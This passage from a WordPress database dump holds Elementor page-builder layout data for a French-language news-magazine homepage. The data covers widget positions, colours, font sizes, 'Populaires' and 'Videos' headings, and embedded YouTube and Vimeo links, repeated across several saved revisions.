px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\",\"category_bg_color\":\"#357edd\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1412,489,'_elementor_version','0.4'),(1413,489,'_elementor_css','a:3:{s:4:\"time\";i:1508920156;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1414,490,'_elementor_edit_mode','builder'),(1415,490,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\",\"category_bg_color\":\"#357edd\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1416,490,'_elementor_version','0.4'),(1419,360,'_oembed_3bdd350cf0ca2ca1bebe676e109d3ce7','{{unknown}}'),(1420,491,'_elementor_edit_mode','builder'),(1421,491,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_gen